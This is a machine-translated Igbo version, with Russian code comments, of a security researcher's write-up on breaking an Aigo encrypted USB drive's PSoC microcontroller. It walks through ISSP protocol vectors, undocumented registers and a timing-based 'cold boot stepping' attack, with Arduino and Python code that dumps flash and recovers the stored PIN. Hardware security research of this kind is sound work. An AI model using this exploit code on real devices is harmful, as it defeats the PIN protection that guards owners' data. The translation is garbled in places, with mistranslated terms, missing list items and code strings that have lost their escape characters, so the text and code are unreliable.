Nke a bụ akụkụ nke abụọ na nke ikpeazụ nke akụkọ gbasara hacking mpụta draịva nzuzo nzuzo. Ka m chetara gị na n'oge na-adịbeghị anya onye ọrụ ibe wetara m draịvụ ike Patriot (Aigo) SK8671, m kpebiri ịtụgharị ya, ma ugbu a, m na-ekerịta ihe si na ya pụta. Tupu ịgụkwuo ya, jide n'aka na ị gụọ ya edemede.
4. Anyị na-amalite na-ekpofu si n'ime PSoC flash mbanye
Yabụ, ihe niile na-egosi (dị ka anyị guzobe na [akụkụ nke mbụ] ()) na echekwara koodu PIN na omimi omimi nke PSoC. Ya mere, anyị kwesịrị ịgụ ihe omimi ndị a. N'ihu ọrụ dị mkpa:
- jikwaa "nkwukọrịta" na microcontroller;
- chọta ụzọ ị ga-esi lelee ma "nkwukọrịta" a na-echebe site n'ịgụ ihe site n'èzí;
- chọta ụzọ agabiga nchedo.
Enwere ebe abụọ ọ dabara na ịchọ koodu PIN ziri ezi:
- ebe nchekwa flash ime;
- SRAM, ebe enwere ike ịchekwa koodu ntụtụ iji tụnyere ya na koodu ntụtụ nke onye ọrụ tinyere.
N'ile anya n'ihu, a ga m achọpụta na m ka jisiri ike wepụ draịva PSoC dị n'ime - na-agafe usoro nchekwa ya site na iji ngwaike a na-akpọ "ịchọ akpụkpọ ụkwụ oyi" - mgbe m nwesịrị ike enweghị akwụkwọ nke usoro ISSP. Nke a nyere m ohere ịtụfu koodu PIN ozugbo.
$ ./psoc.py
syncing: KO OK
[...]
PIN: 1 2 3 4 5 6 7 8 9Koodu mmemme ikpeazụ:
- ;
- .
5. ISSP protocol
5.1. Kedu ihe bụ ISSP
"Mkparịta ụka" na microcontroller nwere ike ịpụta ihe dị iche iche: site na "onye na-ere ahịa na onye na-ere ahịa" gaa na mmekọrịta site na iji usoro usoro (dịka ọmụmaatụ, ICSP maka Microchip's PIC).
Cypress nwere protocol nke ya maka nke a, nke a na-akpọ ISSP (in-system serial programming protocol), nke akọwara n'akụkụ ya. . na-enyekwa ụfọdụ ozi. Enwekwara otu OpenSource nke akpọrọ HSSP (anyị ga-eji ya obere oge). ISSP na-arụ ọrụ dị ka ndị a:
- malitegharịa PSoC;
- wepụta nọmba anwansi ahụ na ntụtụ data serial nke PSoC a; ịbanye na ọnọdụ mmemme nke mpụga;
- zipu iwu, nke bụ eriri obere ogologo a na-akpọ "vectors".
Akwụkwọ ISSP na-akọwapụta vector ndị a maka naanị ntakịrị njuaka nke iwu:
- Mmalite-1
- Mmalite-2
- Mmalite-3 (nhọrọ 3V na 5V)
- Nhazi-NJ
- Gụọ-ID-OKWU
- SET-BLOCK-NUM: 10011111010dddddddd111, ebe dddddddd=mgbochi #
- ỌKỤKWU KWESỊRỊ
- Mmemme-Mgbochi
- Nyochaa-Ntọala
- GỤỌ-BYTE: 10110aaaaaaZDDDDDDDDZ1, ebe DDDDDDDD = data pụta, aaaaa = adreesị (bit 6)
- WRITE-BYTE: 10010aaaaaaddddddd111, ebe dddddddd = data n'ime, aaaaa = adreesị (bit 6)
- KWURU
- Ntụle-Nhazi
- GỤKWUO: 10111111001ZDDDDDDDDZ110111111000ZDDDDDDDDZ1, ebe DDDDDDDDDDDDDDDD = data pụta: checksum ngwaọrụ
- KPỤKWUO
Dịka ọmụmaatụ, vector maka Initialize-2:
1101111011100000000111 1101111011000000000111
1001111100000111010111 1001111100100000011111
1101111010100000000111 1101111010000000011111
1001111101110000000111 1101111100100110000111
1101111101001000000111 1001111101000000001111
1101111000000000110111 1101111100000000000111
1101111111100010010111Vector niile nwere otu ogologo: 22 bit. Akwụkwọ HSSP nwere ụfọdụ ozi agbakwunyere na ISSP: "Otu ISSP vector abụghị ihe karịrị ntakịrị usoro nke na-anọchi anya usoro ntuziaka."
5.2. Demystifying Vectors
Ka anyị chọpụta ihe na-eme ebe a. Na mbido, echere m na otu vectors ndị a bụ ụdị ntụzịaka nke M8C, mana ka m nyochachara echiche a, achọpụtara m na opcodes nke arụmọrụ adabaghị.
Mgbe ahụ, m googleed vector n'elu wee hụ ọmụmụ ebe onye edemede, n'agbanyeghị na ọ naghị akọwapụta nkọwa, na-enye ụfọdụ ndụmọdụ bara uru: "Ntụziaka nke ọ bụla na-amalite site na ibe n'ibe atọ nke kwekọrọ na otu n'ime mnemonics anọ (gụọ site na RAM, dee na RAM, gụọ ndekọ, dee ndekọ). Mgbe ahụ enwere ibe n'ibe adreesị 8, na-esote bit data 8 (gụọ ma ọ bụ dee) na n'ikpeazụ nkwụsịtụ atọ."
Mgbe ahụ enwere m ike ị nweta ozi bara uru na ngalaba Supervisory ROM (SROM). . SROM bụ ROM siri ike na PSoC nke na-enye ọrụ ịba uru (n'ụzọ yiri Syscall) maka koodu mmemme na-agba ọsọ na oghere onye ọrụ:
- 00h:SWBoot Tọgharia
- 01h: ReadBlock
- 02h: WriteBlock
- 03h: Nhichapụ
- 06h: Isiokwu
- 07h: CheckSum
- 08h: calibrate0
- 09h: calibrate1
Site n'ịtụle aha vector na ọrụ SROM, anyị nwere ike ịdepụta ọrụ dị iche iche nke protocol a kwadoro na nke SROM tụrụ anya ya. N'ihi nke a, anyị nwere ike decode atọ mbụ nke ISSP vectors:
- 100 => "wrem"
- 101 => "rdmem"
- 110 => "Ezigbo"
- 111 => "rdreg"
Agbanyeghị, enwere ike nweta nghọta zuru oke nke usoro on-chip naanị site na nkwurịta okwu na PSoC.
5.3. Mmekọrịta na PSoC
Ebe ọ bụ na Dirk Petrautsky nwere ugbua Koodu HSSP nke Cypress na Arduino, ejiri m Arduino Uno jikọọ na njikọ ISSP nke bọọdụ ahụigodo.
Biko mara na n'ime nyocha m, agbanwere m koodu Dirk ntakịrị. Ị nwere ike ịhụ mgbanwe m na GitHub: na edemede Python kwekọrọ maka imekọrịta ihe na Arduino, na ebe nchekwa m .
Yabụ, n'iji Arduino, ejiri m naanị vector "ọrụ" mee ihe maka "mmekọrịta". Agbalịrị m ịgụ ROM dị n'ime site na iji iwu VERIFY. Dị ka a tụrụ anya ya, enweghị m ike ime nke a. Eleghị anya n'ihi eziokwu ahụ na-arụ ọrụ nchebe bits n'ime flash mbanye.
Mgbe ahụ, m kere ole na ole nke m dị mfe vector maka ide na ịgụ ebe nchekwa / ndekọ. Biko mara na anyị nwere ike ịgụ SROM niile n'agbanyeghị na echekwara flash mbanye!
5.4. Nchọpụta ndebanye aha na mgbawa
Mgbe m lere anya vectors "gbasara", achọpụtara m na ngwaọrụ ahụ na-eji ndekọ na-enweghị akwụkwọ (0xF8-0xFA) iji kọwaa opcode M8C, nke a na-egbu ozugbo, na-agafe nchebe. Nke a nyere m ohere ịme opcode dị iche iche dịka "ADD", "MOV A, X", "PUSH" ma ọ bụ "JMP". Ekele dịrị ha (site na ilele mmetụta ndị ha nwere na ndekọ aha) enwere m ike ikpebi nke n'ime akwụkwọ ndekọ aha na-edeghị akwụkwọ bụ n'ezie akwụkwọ ndekọ aha (A, X, SP na PC).
N'ihi nke a, koodu "gbasasịrị" nke ngwá ọrụ HSSP_disas.rb mepụtara dị ka nke a (m gbakwunyere nkwupụta maka idoanya):
--== init2 ==--
[DE E0 1C] wrreg CPU_F (f7), 0x00 # сброс флагов
[DE C0 1C] wrreg SP (f6), 0x00 # сброс SP
[9F 07 5C] wrmem KEY1, 0x3A # обязательный аргумент для SSC
[9F 20 7C] wrmem KEY2, 0x03 # аналогично
[DE A0 1C] wrreg PCh (f5), 0x00 # сброс PC (MSB) ...
[DE 80 7C] wrreg PCl (f4), 0x03 # (LSB) ... до 3 ??
[9F 70 1C] wrmem POINTER, 0x80 # RAM-указатель для выходных данных
[DF 26 1C] wrreg opc1 (f9), 0x30 # Опкод 1 => "HALT"
[DF 48 1C] wrreg opc2 (fa), 0x40 # Опкод 2 => "NOP"
[9F 40 3C] wrmem BLOCKID, 0x01 # BLOCK ID для вызова SSC
[DE 00 DC] wrreg A (f0), 0x06 # номер "Syscall" : TableRead
[DF 00 1C] wrreg opc0 (f8), 0x00 # Опкод для SSC, "Supervisory SROM Call"
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12 # Недокумментированная операция: выполнить внешний опкод
5.5. Ebe nchekwa
N'oge a, enwere m ike ịkparịta ụka na PSoC, mana enweghị m ozi a pụrụ ịdabere na ya gbasara ibe nchekwa nke draịva flash. Ọ tụrụ m n'anya nke ukwuu na Cypress anaghị enye onye ọrụ ngwaọrụ ahụ ụzọ ọ bụla iji lelee ma ọ gbanyere nchekwa ahụ. M gwuru miri n'ime Google ka m wee ghọta na koodu HSSP nke Cypress nyere ka emelitere ka Dirk tọhapụrụ mgbanwe ya. Ya mere! vector ọhụrụ a apụtala:
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[9F A0 1C] wrmem 0xFD, 0x00 # неизвестные аргументы
[9F E0 1C] wrmem 0xFF, 0x00 # аналогично
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 02 1C] wrreg A (f0), 0x10 # недокументированный syscall !
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12Iji vector a (lee read_security_data na psoc.py), anyị na-enweta ihe nchekwa niile na SRAM na 0x80, ebe enwere bits abụọ n'otu ngọngọ echekwara.
Ihe si na ya pụta na-akụda mmụọ: a na-echekwa ihe niile na ọnọdụ "gbanyụọ ọgụgụ na ide ihe n'èzí". Ya mere, ọ bụghị naanị na anyị enweghị ike ịgụ ihe ọ bụla site na draịva flash, ma anyị enweghị ike ide ihe ọ bụla (dịka ọmụmaatụ, iji wụnye ROM dumper n'ebe ahụ). Na nanị ụzọ iji gbanyụọ nchebe bụ kpamkpam ihichapụ dum mgbawa. 🙁
6. Mwakpo mbụ ( dara ada): ROMX
Agbanyeghị, anyị nwere ike ịnwale aghụghọ a: ebe anyị nwere ikike ịme opcodes aka ike, gịnị kpatara na ị gaghị eme ROMX, nke a na-eji agụ ebe nchekwa flash? Ụzọ a nwere ezigbo ohere ịga nke ọma. N'ihi na ọrụ ReadBlock nke na-agụ data sitere na SROM (nke vectors na-eji) na-enyocha ma akpọpụtara ya site na ISSP. Agbanyeghị, opcode ROMX nwere ike ọ gaghị enwe ụdị nlele ahụ. Yabụ nke a bụ koodu Python (mgbe gbakwunyere klaasị enyemaka ole na ole na koodu Arduino):
for i in range(0, 8192):
write_reg(0xF0, i>>8) # A = 0
write_reg(0xF3, i&0xFF) # X = 0
exec_opcodes("x28x30x40") # ROMX, HALT, NOP
byte = read_reg(0xF0) # ROMX reads ROM[A|X] into A
print "%02x" % ord(byte[0]) # print ROM byteỌ dị nwute na koodu a anaghị arụ ọrụ. 🙁 Ma ọ bụ kama ọ na-arụ ọrụ, mana na mmepụta anyị na-enweta opcodes nke anyị (0x28 0x30 0x40)! Echeghị m na ọrụ kwekọrọ na ngwaọrụ ahụ bụ ihe nchebe nke ịgụ akwụkwọ. Nke a dị ka aghụghọ injinia: mgbe ị na-eme opcodes mpụga, a na-atụgharị ụgbọ ala ROM gaa na nchekwa nwa oge.
7. Mwakpo nke Abụọ: Nchọgharị akpụkpọ ụkwụ oyi
Ebe ọ bụ na aghụghọ ROMX adịghị arụ ọrụ, amalitere m iche echiche banyere ọdịiche ọzọ nke aghụghọ a - kọwara n'akwụkwọ ahụ. .
7.1. Mmejuputa
Akwụkwọ ISSP na-enye vector ndị a maka CHECKSUM-SETUP:
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[9F 40 1C] wrmem BLOCKID, 0x00
[DE 00 FC] wrreg A (f0), 0x07
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12Nke a na-akpọ ọrụ SROM 0x07, dị ka egosiri na akwụkwọ (italics mine):
Nyochaa checksum ọrụ a. Ọ na-agbakọ nlele nlele 16-bit nke ọnụọgụ nke blocks akọwapụtara onye ọrụ n'otu ụlọ akụ flash, malite na efu. A na-eji paramita BLOCKID agafe ọnụọgụ ngọngọ nke a ga-eji mgbe ị na-agbakọ checksum. Uru nke "1" ga-agbakọ naanị checksum maka ngọngọ efu; ebe "0" ga-eme ka a gbakọọ mkpokọta checksum nke blocks 256 nke ụlọ akụ flash. A na-eweghachite ego nlele 16-bit site na KEY1 na KEY2. Oke KEY1 na-echekwa ọnụọgụ 8 dị ala nke checksum, na oke KEY2 na-echekwa 8 bit dị elu. Maka ngwaọrụ nwere ọtụtụ ụlọ akụ flash, a na-akpọ ọrụ checksum maka nke ọ bụla iche. A na-edozi nọmba ụlọ akụ nke ọ ga-eji rụọ ọrụ site na ndebanye aha FLS_PR1 (site n'itinye ntakịrị n'ime ya kwekọrọ na ụlọ akụ flash ebumnuche).
Rịba ama na nke a bụ checksum dị mfe: a na-agbakwunye bytes n'otu n'otu; enweghị CRC dị egwu. Na mgbakwunye, n'ịmara na isi M8C nwere obere ndekọ ndekọ, echere m na mgbe ị na-agbakọ checksum, a ga-edekọ ụkpụrụ etiti n'otu mgbanwe ahụ ga-emecha gaa na mmepụta: KEY1 (0xF8) / KEY2 ( 0xF9).
Yabụ na tiori m ọgụ dị ka nke a:
- Anyị na-ejikọta site na ISSP.
- Anyị na-eji vector CHECKSUM-SETUP amalite ịgbakọ ego.
- Anyị na-amalitegharị processor mgbe oge a kapịrị ọnụ T.
- Anyị na-agụ RAM iji nweta checksum C dị ugbu a.
- Tinyegharịa nzọụkwụ 3 na 4, na-abawanye T ntakịrị oge ọ bụla.
- Anyị na-enwetaghachi data site na draịva flash site n'iwepụ checksum C nke gara aga na nke dị ugbu a.
Agbanyeghị, enwere nsogbu: vector Initialize-1 nke anyị ga-ezipụ mgbe ịmalitegharịchara, degharịa KEY1 na KEY2:
1100101000000000000000 # Магия, переводящая PSoC в режим программирования
nop
nop
nop
nop
nop
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A # контрольная сумма перезаписывается здесь
[9F 20 7C] wrmem KEY2, 0x03 # и здесь
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 01 3C] wrreg A (f0), 0x09 # SROM-функция 9
[DF 00 1C] wrreg opc0 (f8), 0x00 # SSC
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12Nke a koodu overwrite anyị dị oké ọnụ ahịa checksum site na-akpọ Calibrate1 (SROM ọrụ 9)...Ma eleghị anya, anyị nwere ike dị nnọọ zipu nọmba anwansi (site na mmalite nke koodu n'elu) ịbanye programming mode, wee gụọ SRAM? Ma ee, ọ na-arụ ọrụ! Koodu Arduino na-eme mwakpo a dị mfe:
case Cmnd_STK_START_CSUM:
checksum_delay = ((uint32_t)getch())<<24;
checksum_delay |= ((uint32_t)getch())<<16;
checksum_delay |= ((uint32_t)getch())<<8;
checksum_delay |= getch();
if(checksum_delay > 10000) {
ms_delay = checksum_delay/1000;
checksum_delay = checksum_delay%1000;
}
else {
ms_delay = 0;
}
send_checksum_v();
if(checksum_delay)
delayMicroseconds(checksum_delay);
delay(ms_delay);
start_pmode();- Gụọ checkum_delay.
- Gbaa ngụkọ checksum (send_checksum_v).
- Chere maka oge a kapịrị ọnụ; na-echebara ọnyà ndị a echiche:
- Efuru m ọtụtụ oge ruo mgbe m chọpụtara ihe ọ pụtara na-arụ ọrụ nke ọma naanị na igbu oge na-agafeghị 16383 μs;
- wee gbuokwa otu oge ahụ ruo mgbe m chọpụtara na igbu ogeMicroseconds, ọ bụrụ na 0 gafere ya dị ka ntinye, na-arụ ọrụ na-ezighi ezi!
- Malitegharịa PSoC n'ime ọnọdụ mmemme (anyị na-eziga nọmba anwansi, na-ezigaghị vector mmalite).
Koodu ikpeazụ na Python:
for delay in range(0, 150000): # задержка в микросекундах
for i in range(0, 10): # количество считывания для каждойиз задержек
try:
reset_psoc(quiet=True) # перезагрузка и вход в режим программирования
send_vectors() # отправка инициализирующих векторов
ser.write("x85"+struct.pack(">I", delay)) # вычислить контрольную сумму + перезагрузиться после задержки
res = ser.read(1) # считать arduino ACK
except Exception as e:
print e
ser.close()
os.system("timeout -s KILL 1s picocom -b 115200 /dev/ttyACM0 2>&1 > /dev/null")
ser = serial.Serial('/dev/ttyACM0', 115200, timeout=0.5) # открыть последовательный порт
continue
print "%05d %02X %02X %02X" % (delay, # считать RAM-байты
read_regb(0xf1),
read_ramb(0xf8),
read_ramb(0xf9))Na nkenke, ihe koodu a na-eme:
- Reboot PSoC (ma zipu ya nọmba anwansi).
- Na-eziga vector mmalite mmalite zuru ezu.
- Ọ na-akpọ ọrụ Arduino Cmnd_STK_START_CSUM (0x85), ebe a na-agafe oge n'ime microseconds dị ka oke.
- Na-agụ checksum (0xF8 na 0xF9) na ndekọ na-enweghị akwụkwọ 0xF1.
A na-eme koodu a ugboro 10 na 1 microns. 0xF1 gụnyere ebe a n'ihi na ọ bụ naanị ndekọ gbanwere mgbe ị na-agbakọ checksum. Ikekwe ọ bụ ụdị mgbanwe nwa oge nke ngalaba mgbako na-eji. Rịba ama mbanye anataghị ikike jọrọ njọ m na-eji tọgharịa Arduino site na iji picocom mgbe Arduino kwụsịrị igosi ihe ịrịba ama nke ndụ (enweghị echiche kpatara ya).
7.2. Na-agụ nsonaazụ
Nsonaazụ nke edemede Python dị ka nke a (dị mfe maka ịgụ):
DELAY F1 F8 F9 # F1 – вышеупомянутый неизвестный регистр
# F8 младший байт контрольной суммы
# F9 старший байт контрольной суммы
00000 03 E1 19
[...]
00016 F9 00 03
00016 F9 00 00
00016 F9 00 03
00016 F9 00 03
00016 F9 00 03
00016 F9 00 00 # контрольная сумма сбрасывается в 0
00017 FB 00 00
[...]
00023 F8 00 00
00024 80 80 00 # 1-й байт: 0x0080-0x0000 = 0x80
00024 80 80 00
00024 80 80 00
[...]
00057 CC E7 00 # 2-й байт: 0xE7-0x80: 0x67
00057 CC E7 00
00057 01 17 01 # понятия не имею, что здесь происходит
00057 01 17 01
00057 01 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 F8 E7 00 # Снова E7?
00058 D0 17 01
[...]
00059 E7 E7 00
00060 17 17 00 # Хмммммм
[...]
00062 00 17 00
00062 00 17 00
00063 01 17 01 # А, дошло! Вот он же перенос в старший байт
00063 01 17 01
[...]
00075 CC 17 01 # Итак, 0x117-0xE7: 0x30Nke a na-ekwu, anyị nwere nsogbu: ebe ọ bụ na anyị na-arụ ọrụ na checksum n'ezie, null byte anaghị agbanwe uru agụ. Otú ọ dị, ebe ọ bụ na usoro ngụkọta oge dum (8192 bytes) na-ewe 0,1478 sekọnd (na obere mgbanwe oge ọ bụla a na-agba ọsọ), nke na-adaba na 18,04 μs kwa byte, anyị nwere ike iji oge a lelee uru checksum n'oge kwesịrị ekwesị. Maka ịgba ọsọ mbụ, a na-agụ ihe niile n'ụzọ dị mfe, ebe ọ bụ na oge nke usoro mgbakọ na mwepụ bụ ihe fọrọ nke nta ka ọ bụrụ otu. Agbanyeghị, njedebe nke mkpofu a adịchaghị zie ezie n'ihi na “obere oge ndapụta” na ọsọ ọ bụla na-agbakwunye ka ọ dị ịrịba ama:
134023 D0 02 DD
134023 CC D2 DC
134023 CC D2 DC
134023 CC D2 DC
134023 FB D2 DC
134023 3F D2 DC
134023 CC D2 DC
134024 02 02 DC
134024 CC D2 DC
134024 F9 02 DC
134024 03 02 DD
134024 21 02 DD
134024 02 D2 DC
134024 02 02 DC
134024 02 02 DC
134024 F8 D2 DC
134024 F8 D2 DC
134025 CC D2 DC
134025 EF D2 DC
134025 21 02 DD
134025 F8 D2 DC
134025 21 02 DD
134025 CC D2 DC
134025 04 D2 DC
134025 FB D2 DC
134025 CC D2 DC
134025 FB 02 DD
134026 03 02 DD
134026 21 02 DDNke ahụ bụ mkpofu 10 maka igbu oge microsekọnd ọ bụla. Ngụkọta oge ọrụ maka ịkwatu ihe niile 8192 bytes nke flash mbanye bụ ihe dị ka awa 48.
7.3. Nrụgharị ọnụọgụ abụọ Flash
Emechabeghị m ide koodu nke ga-emegharị koodu mmemme nke draịva flash kpamkpam, na-eburu n'uche mgbanwe oge niile. Agbanyeghị, eweghachila m mmalite koodu a. Iji jide n'aka na m mere ya nke ọma, ejiri m m8cdis kwasa ya:
0000: 80 67 jmp 0068h ; Reset vector
[...]
0068: 71 10 or F,010h
006a: 62 e3 87 mov reg[VLT_CR],087h
006d: 70 ef and F,0efh
006f: 41 fe fb and reg[CPU_SCR1],0fbh
0072: 50 80 mov A,080h
0074: 4e swap A,SP
0075: 55 fa 01 mov [0fah],001h
0078: 4f mov X,SP
0079: 5b mov A,X
007a: 01 03 add A,003h
007c: 53 f9 mov [0f9h],A
007e: 55 f8 3a mov [0f8h],03ah
0081: 50 06 mov A,006h
0083: 00 ssc
[...]
0122: 18 pop A
0123: 71 10 or F,010h
0125: 43 e3 10 or reg[VLT_CR],010h
0128: 70 00 and F,000h ; Paging mode changed from 3 to 0
012a: ef 62 jacc 008dh
012c: e0 00 jacc 012dh
012e: 71 10 or F,010h
0130: 62 e0 02 mov reg[OSC_CR0],002h
0133: 70 ef and F,0efh
0135: 62 e2 00 mov reg[INT_VC],000h
0138: 7c 19 30 lcall 1930h
013b: 8f ff jmp 013bh
013d: 50 08 mov A,008h
013f: 7f retỌ dị ka ihe ezi uche dị na ya!
7.4. Ịchọta adreesị nchekwa koodu PIN
Ugbu a anyị nwere ike ịgụ checksum n'oge anyị chọrọ, anyị nwere ike ịlele etu na ebe ọ na-agbanwe ngwa ngwa mgbe anyị:
- tinye koodu PIN ezighi ezi;
- gbanwee koodu ntụtụ.
Nke mbụ, iji chọta adreesị nchekwa dị nso, ewera m mkpofu checksum na ịrị elu 10 ms ka mweghachichara. M tinyezie PIN na-ezighi ezi wee mee otu ihe ahụ.
Ihe si na ya pụta adịghị nnọọ mma, ebe ọ bụ na e nwere ọtụtụ mgbanwe. Mana n'ikpeazụ enwere m ike ịchọpụta na checksum gbanwere ebe n'etiti 120000 µs na 140000 µs nke igbu oge. Mana “pincode” m gosipụtara ezighi ezi - n'ihi ihe arụrụ arụ nke usoro igbu ogeMicroseconds, nke na-eme ihe dị ịtụnanya mgbe 0 gafere ya.
Mgbe ahụ, mgbe m nọrọ ihe fọrọ nke nta ka ọ bụrụ awa 3, echetara m na SROM usoro oku CheckSum na-enweta arụmụka dị ka ntinye nke na-akọwa ọnụọgụ nke blocks maka checksum! Nke ahụ. anyị nwere ike wepụta adreesị nchekwa nke koodu PIN na ngwa “mgbalị ezighi ezi”, yana izi ezi ruru ngọngọ 64-byte.
Ọsọ mbụ m rụpụtara nsonaazụ a:
M gbanwere PIN site na "123456" gaa na "1234567" wee nweta:
Ya mere, koodu PIN na counter nke mgbalị ezighi ezi yiri ka echekwara na ngọngọ nke 126.
7.5. Ịna-ekpofu ihe mgbochi nke 126
Block #126 kwesịrị ịnọ n'ebe dị gburugburu 125x64x18 = 144000μs, site na mmalite nke ngụkọta ego checksum, na mkpofu m zuru oke, ọ na-adịkwa mma. Mgbe ahụ, mgbe ejiri aka wepụsịa ọtụtụ mkpofu na-adịghị mma (n'ihi nchịkọta nke "obere oge ngbanwe"), agwụchara m ịnweta bytes ndị a (na nkwụsị nke 145527 μs):
O doro anya na echekwara koodu PIN n'ụdị ezoro ezo! N'ezie, edeghị ụkpụrụ ndị a na koodu ASCII, mana dịka o siri pụta, ha na-egosipụta ọgụgụ ndị e nwetara na ahụigodo capacitive.
N'ikpeazụ, agbagara m ule ọzọ iji chọpụta ebe echekwara counter mgbalị ọjọọ. Nke a bụ nsonaazụ:
0xFF - pụtara "mgbalị 15" na ọ na-ebelata na mgbalị ọ bụla dara ada.
7.6. Koodu PIN mgbake
Nke a bụ koodu jọrọ njọ nke na-ejikọta ihe ndị dị n'elu ọnụ:
def dump_pin():
pin_map = {0x24: "0", 0x25: "1", 0x26: "2", 0x27:"3", 0x20: "4", 0x21: "5",
0x22: "6", 0x23: "7", 0x2c: "8", 0x2d: "9"}
last_csum = 0
pin_bytes = []
for delay in range(145495, 145719, 16):
csum = csum_at(delay, 1)
byte = (csum-last_csum)&0xFF
print "%05d %04x (%04x) => %02x" % (delay, csum, last_csum, byte)
pin_bytes.append(byte)
last_csum = csum
print "PIN: ",
for i in range(0, len(pin_bytes)):
if pin_bytes[i] in pin_map:
print pin_map[pin_bytes[i]],
printNke a bụ nsonaazụ ogbugbu ya:
$ ./psoc.py
syncing: KO OK
Resetting PSoC: KO Resetting PSoC: KO Resetting PSoC: OK
145495 53e2 (0000) => e2
145511 5407 (53e2) => 25
145527 542d (5407) => 26
145543 5454 (542d) => 27
145559 5474 (5454) => 20
145575 5495 (5474) => 21
145591 54b7 (5495) => 22
145607 54da (54b7) => 23
145623 5506 (54da) => 2c
145639 5506 (5506) => 00
145655 5533 (5506) => 2d
145671 554c (5533) => 19
145687 554e (554c) => 02
145703 554e (554e) => 00
PIN: 1 2 3 4 5 6 7 8 9Hụ! Na-arụ ọrụ!
Biko mara na ụkpụrụ latency m ji mee ihe nwere ike dabara na otu PSoC akọwapụtara - nke m ji.
8. Gịnị na-esote?
Yabụ, ka anyị chịkọta n'akụkụ PSoC, n'ihe gbasara mbanye Aigo anyị:
- anyị nwere ike ịgụ SRAM ọ bụrụgodị na echekwabara ya;
- Anyị nwere ike ịgafe mgbochi mgbochi swipe site na iji mgbanaka akpụkpọ ụkwụ oyi wee gụọ koodu PIN ozugbo.
Agbanyeghị, ọgụ anyị nwere ntụpọ ụfọdụ n'ihi nsogbu mmekọrịta. Enwere ike imeziwanye ya dịka ndị a:
- dee akụrụngwa iji dekọọ data mmepụta nke enwetara n'ụzọ ziri ezi n'ihi mwakpo “akpụkpọ ụkwụ oyi”;
- jiri ngwa FPGA mepụta oge igbu oge karịa (ma ọ bụ jiri oge ngwaike Arduino);
- nwaa ọgụ ọzọ: tinye koodu PIN ezighi ezi, malitegharịa ma tụfuo RAM, na-atụ anya na a ga-echekwa koodu PIN ziri ezi na RAM maka ntụnyere. Otú ọ dị, nke a adịghị mfe ime na Arduino, ebe ọ bụ na akara ngosi Arduino bụ 5 volts, ebe bọọdụ anyị na-enyocha na-arụ ọrụ na akara 3,3 volt.
Otu ihe na-adọrọ mmasị nke enwere ike ịnwale bụ iji ọkwa voltaji gwuo egwu iji gafere nchebe ịgụ. Ọ bụrụ na usoro a na-arụ ọrụ, anyị ga-enwe ike ịnweta data ziri ezi site na draịva flash - kama ịdabere n'ịgụ checksum na-egbu oge na-ezighi ezi.
Ebe ọ bụ na SROM nwere ike na-agụ ihe nche site na oku usoro ReadBlock, anyị nwere ike ime otu ihe ahụ na blọọgụ Dmitry Nedospasov - mmejuputa mwakpo Chris Gerlinski, kwupụtara na ogbako ahụ. .
Ihe ọzọ na-atọ ụtọ nwere ike ime bụ iwepụ ikpe ahụ na mgbawa: iji wepụ SRAM, chọpụta oku usoro na-enweghị akwụkwọ na adịghị ike.
9. Mmechi
Yabụ, nchekwa nke draịva a na-ahapụ ọtụtụ ihe achọrọ, n'ihi na ọ na-eji microcontroller mgbe niile (ọ bụghị “agbasiri ike”) iji chekwaa koodu PIN… Plus, ahụbeghị m (ma) ka ihe na-aga na data. izo ya ezo na ngwaọrụ a!
Kedu ihe ị nwere ike ịkwado maka Aigo? Mgbe nyochachara ụdị abụọ nke draịva HDD ezoro ezo, na 2015 emere m na SyScan, nke ọ nyochara nsogbu nchekwa nke ọtụtụ draịva HDD dị n'èzí, wee nye ndụmọdụ maka ihe enwere ike imeziwanye na ha. 🙂
Eji m izu ụka abụọ na ọtụtụ mgbede mee nyocha a. Ngụkọta ihe dị ka awa 40. Na-agụta site na mmalite (mgbe m meghere diski) ruo na njedebe (Ntupu koodu PIN). Otu awa 40 ahụ gụnyere oge m ji dee akụkọ a. Ọ bụ njem na-akpali akpali nke ukwuu.
isi: www.habr.com